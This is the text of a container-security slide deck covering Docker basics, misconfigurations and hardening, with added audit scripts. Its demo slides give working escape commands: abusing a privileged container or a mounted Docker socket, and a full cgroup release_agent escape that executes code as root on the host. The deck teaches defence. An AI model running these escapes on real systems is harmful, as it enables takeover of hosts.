Docker Decoded: From Basics to Breaches - Rakesh Seal
NullKolkata
15 slides
Oct 07, 2024
About This Presentation
Docker Decoded : From Basics to Breaches by Rakesh Seal
Size: 2.35 MB
Language: en
Added: Oct 07, 2024
Slides: 15 pages
Slide Content
Docker Decoded: Basics to Breaches. Explaining container security with hands-on demos.
$ whoami: Rakesh Seal. R&D, Keysight (ATI Research). Network security, embedded systems (IoT), full-stack dev, automation enthusiast, 15+ patent publications. Plays DotA. rakeshseal0.github.io
Docker Who?
Docker Architecture
Core Concepts
Image and Container Lifecycle (Hands On)
Docker Networking: bridge, host, overlay, macvlan
Docker Security Layers
Common Docker Misconfigs
- Do not expose the Docker daemon socket (not over TCP, and not bind-mounted into containers)
- Limit capabilities: grant only the specific capabilities a container needs
- Prevent in-container privilege escalation (no-new-privileges)
- Be mindful of inter-container connectivity
- Limit resources: memory, CPU, file descriptors, processes, restarts
- Set the filesystem and volumes to read-only
Reference: https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html
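The items on this slide map directly onto fields of `docker inspect` output, so they can be checked mechanically. The script below is an added example, not part of the talk or the OWASP cheat sheet: it reads a `docker inspect` JSON array from stdin and reports, per container, each misconfiguration from the list (privileged mode, a mounted daemon socket, capabilities not dropped or dangerous ones added, missing no-new-privileges, root user, writable rootfs, missing memory/CPU/pids limits, an unbounded restart policy). The two containers in SAMPLE are constructed records in the shape of real `docker inspect` output, one run the way Demo-1/Demo-2 run it and one run with the hardening flags.

```python
"""Audit `docker inspect` output for the misconfigurations listed on the slide.

Added example (not from the talk): `docker inspect <container ...> | python3 audit.py`,
or run with no stdin to audit the constructed SAMPLE below.
"""
import json
import sys

# Host paths that hand a container full control of the daemon (Demo-2).
DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}
# Capabilities that on their own are enough to reach the host (Demo-3 needs SYS_ADMIN).
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "NET_ADMIN"}


def _cap(name: str) -> str:
    """Normalise 'cap_sys_admin' / 'SYS_ADMIN' to 'SYS_ADMIN'."""
    name = name.upper()
    return name[4:] if name.startswith("CAP_") else name


def audit(container: dict) -> list:
    """Return a list of findings for one element of the `docker inspect` JSON array."""
    hc = container.get("HostConfig") or {}
    cfg = container.get("Config") or {}
    findings = []

    # Demo-1: --privileged grants every capability and exposes host devices in /dev.
    if hc.get("Privileged"):
        findings.append("privileged container (all capabilities, host devices visible)")

    # Demo-2: a bind-mounted daemon socket is equivalent to root on the host.
    for mount in container.get("Mounts") or []:
        if mount.get("Source") in DOCKER_SOCKETS:
            findings.append("docker daemon socket mounted at %s" % mount.get("Destination"))

    # Limit capabilities: drop the default set, add back only what is needed.
    cap_drop = {_cap(c) for c in hc.get("CapDrop") or []}
    cap_add = {_cap(c) for c in hc.get("CapAdd") or []}
    if "ALL" not in cap_drop:
        findings.append("default capability set kept (no --cap-drop ALL)")
    for cap in sorted(cap_add & DANGEROUS_CAPS):
        findings.append("dangerous capability added: CAP_%s" % cap)

    # Prevent in-container privilege escalation via setuid binaries and file capabilities.
    sec_opts = hc.get("SecurityOpt") or []
    if not any(o.startswith("no-new-privileges") and not o.endswith(":false") for o in sec_opts):
        findings.append("no-new-privileges not set")

    # A root process inside the container turns every escape above into host root.
    if not cfg.get("User"):
        findings.append("runs as root inside the container (Config.User empty)")

    # Read-only root filesystem: an attacker cannot drop tools or patch binaries.
    if not hc.get("ReadonlyRootfs"):
        findings.append("root filesystem is writable (no --read-only)")

    # Resource limits: memory, CPU, processes and restarts. 0/None/-1 all mean unlimited.
    if not hc.get("Memory"):
        findings.append("no memory limit")
    if not hc.get("NanoCpus") and not hc.get("CpuQuota"):
        findings.append("no CPU limit")
    if (hc.get("PidsLimit") or 0) <= 0:
        findings.append("no pids limit")
    if (hc.get("RestartPolicy") or {}).get("Name") == "always":
        findings.append("restart policy 'always' (prefer on-failure with a retry cap)")
    return findings


def audit_all(inspect_json: str) -> dict:
    """Map container name -> findings for a whole `docker inspect` JSON array."""
    report = {}
    for c in json.loads(inspect_json):
        name = (c.get("Name") or c.get("Id", "?")).lstrip("/")
        report[name] = audit(c)
    return report


# Constructed sample in the shape of `docker inspect` output (not captured from a real host).
SAMPLE = json.dumps([
    {"Name": "/weak", "Config": {"User": ""},
     "HostConfig": {"Privileged": True, "CapAdd": ["SYS_ADMIN"], "CapDrop": None,
                    "SecurityOpt": None, "ReadonlyRootfs": False, "Memory": 0,
                    "NanoCpus": 0, "CpuQuota": 0, "PidsLimit": None,
                    "RestartPolicy": {"Name": "always", "MaximumRetryCount": 0}},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Name": "/hardened", "Config": {"User": "10001:10001"},
     "HostConfig": {"Privileged": False, "CapAdd": ["NET_BIND_SERVICE"], "CapDrop": ["ALL"],
                    "SecurityOpt": ["no-new-privileges"], "ReadonlyRootfs": True,
                    "Memory": 268435456, "NanoCpus": 500000000, "CpuQuota": 0,
                    "PidsLimit": 100,
                    "RestartPolicy": {"Name": "on-failure", "MaximumRetryCount": 3}},
     "Mounts": []},
])

if __name__ == "__main__":
    data = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for name, findings in audit_all(data).items():
        print("%s: %s" % (name, "OK" if not findings else "%d finding(s)" % len(findings)))
        for f in findings:
            print("  - " + f)
```

The "hardened" record corresponds to flags such as `--cap-drop ALL --cap-add NET_BIND_SERVICE --security-opt no-new-privileges --read-only --user 10001:10001 --memory 256m --cpus 0.5 --pids-limit 100 --restart on-failure:3`; the "weak" record is what `docker run --privileged -v /var/run/docker.sock:/var/run/docker.sock --cap-add SYS_ADMIN` produces and trips every check.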
Demo-1: root access from a privileged container (attacker -> privileged container -> host)
Setup container: docker run -it --privileged ubuntu bash
Verify privileged access (the host's devices are visible): ls /dev
Read kernel messages: dmesg (reads the host's kernel ring buffer; in a default container this is blocked by the default seccomp profile)
Reference: https://www.trendmicro.com/en_in/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html
Demo-2: privilege escalation (host Docker socket mounted)
Setup container: docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu bash
Search for the mounted socket: find / -name docker.sock 2>/dev/null
Install a Docker client and talk to the host daemon through the socket: apt update && apt install docker.io -y
Launch a privileged container with the host's root filesystem mounted: docker run -it --privileged -v /:/host ubuntu bash
The new container is created by the host daemon, so it runs with host privileges; the host's entire filesystem is writable under /host.
Demo-3: Docker escape by cgroup (v1) release_agent abuse
Setup container: docker run -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
(The mount step below needs CAP_SYS_ADMIN and an unconfined AppArmor profile; a plain `docker run -it ubuntu bash` fails at `mount`. The technique relies on the cgroup v1 release_agent hook and does not apply on cgroup v2 hosts.)
Mount a cgroup v1 hierarchy (the rdma controller, or any controller not already mounted):
mkdir /tmp/cgrp
mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/xx
Set up the child cgroup so that the kernel runs release_agent (on the host, as root) when its last process exits:
echo 1 > /tmp/cgrp/xx/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
($host_path is the host-side path of the container's overlay upperdir, so a file written at /cmd in the container is visible to the host at $host_path/cmd.)
Shell file executed by the host:
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
echo "echo \"Greetings from rak3sh <3 \" >> $host_path/output" >> /cmd
chmod +x /cmd
Add a process to our sub-cgroup; when it exits the cgroup empties and the host runs /cmd:
sh -c "echo \$\$ > /tmp/cgrp/xx/cgroup.procs"
Check the output of cmd (a host-side process listing, proving execution outside the container):
cat /output
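Whether Demo-3 can be attempted at all depends on three things visible from inside the container: the effective capability set (CAP_SYS_ADMIN is needed for `mount`), whether the host uses cgroup v1 (release_agent does not exist on cgroup2), and whether the overlay upperdir path leaks through /etc/mtab, which is what the `sed` line recovers. The script below is an added example, not from the talk: it decodes the CapEff bitmask from /proc/self/status, classifies the cgroup mounts, extracts the upperdir the same way the sed command does, and checks /proc/self/attr/current for an enforcing AppArmor profile. The status and mounts texts embedded at the bottom are constructed samples; a80425fb is Docker's default capability mask and a82425fb is that mask with bit 21 (CAP_SYS_ADMIN) set.

```python
"""Check from inside a container whether the Demo-3 cgroup release_agent escape can
even be attempted. Added example, not part of the talk. The pure functions take file
contents as strings so they can be exercised on the constructed samples below."""
import re
from typing import Optional

CAP_SYS_ADMIN = 21  # bit number from include/uapi/linux/capability.h


def parse_cap_eff(status_text: str) -> int:
    """Extract the effective capability bitmask (CapEff) from /proc/self/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line in status text")
    return int(m.group(1), 16)


def has_cap(mask: int, bit: int) -> bool:
    return (mask >> bit) & 1 == 1


def cgroup_version(mounts_text: str) -> str:
    """Return 'v1', 'v2' or 'none' from /proc/self/mounts contents.
    release_agent only exists on cgroup v1 hierarchies (fstype 'cgroup'); a
    pure cgroup2 host has no such hook, so the escape does not apply there."""
    fstypes = set()
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 3:
            fstypes.add(fields[2])
    if "cgroup" in fstypes:
        return "v1"
    if "cgroup2" in fstypes:
        return "v2"
    return "none"


def overlay_upperdir(mounts_text: str) -> Optional[str]:
    """Host-side path of the container's overlay upperdir: the value Demo-3's
    sed command recovers from /etc/mtab to build the release_agent path."""
    m = re.search(r"upperdir=([^,\s]+)", mounts_text)
    return m.group(1) if m else None


def apparmor_confined(attr_text: Optional[str]) -> bool:
    """True when /proc/self/attr/current shows an enforcing profile. Docker's
    docker-default profile denies mount, so the cgroup mount fails even with
    CAP_SYS_ADMIN unless the container runs with apparmor=unconfined."""
    if not attr_text:
        return False
    return attr_text.strip() != "unconfined"


def assess(status_text: str, mounts_text: str, attr_text: Optional[str] = None) -> dict:
    caps = parse_cap_eff(status_text)
    result = {
        "cap_sys_admin": has_cap(caps, CAP_SYS_ADMIN),
        "cgroup": cgroup_version(mounts_text),
        "upperdir": overlay_upperdir(mounts_text),
        "apparmor_confined": apparmor_confined(attr_text),
    }
    result["feasible"] = (result["cap_sys_admin"] and result["cgroup"] == "v1"
                          and result["upperdir"] is not None
                          and not result["apparmor_confined"])
    return result


# Constructed samples (not captured from a real host). a80425fb is Docker's default
# capability set; a82425fb is the same set plus bit 21, as --cap-add=SYS_ADMIN gives.
DEFAULT_STATUS = "Name:\tbash\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
SYSADMIN_STATUS = "Name:\tbash\nCapPrm:\t00000000a82425fb\nCapEff:\t00000000a82425fb\n"
OVERLAY = ("overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:"
           "/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/0123abcd/diff,"
           "workdir=/var/lib/docker/overlay2/0123abcd/work 0 0\n")
MOUNTS_V1 = OVERLAY + "cgroup /sys/fs/cgroup/rdma cgroup ro,nosuid,nodev,noexec,relatime,rdma 0 0\n"
MOUNTS_V2 = OVERLAY + "cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime 0 0\n"


def _read(path: str) -> Optional[str]:
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


if __name__ == "__main__":
    status = _read("/proc/self/status")
    mounts = _read("/etc/mtab") or _read("/proc/self/mounts") or ""
    if status is None:  # not on Linux: show the constructed samples instead
        print("default container:", assess(DEFAULT_STATUS, MOUNTS_V1))
        print("SYS_ADMIN + cgroup v1:", assess(SYSADMIN_STATUS, MOUNTS_V1, "unconfined\n"))
    else:
        print(assess(status, mounts, _read("/proc/self/attr/current")))
```

Run inside the Demo-3 container and `feasible` comes back True; run inside a default `docker run -it ubuntu bash` and `cap_sys_admin` is False, which is why the setup for this demo adds the capability and disables the AppArmor profile.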
Docker Security Best Practices
01 Least privilege: reduce capabilities, run as a non-root user
02 Secure configs: read-only filesystem, avoid unnecessary mounts
03 Runtime security and regular updates: AppArmor or SELinux for more defense, regular updates and patching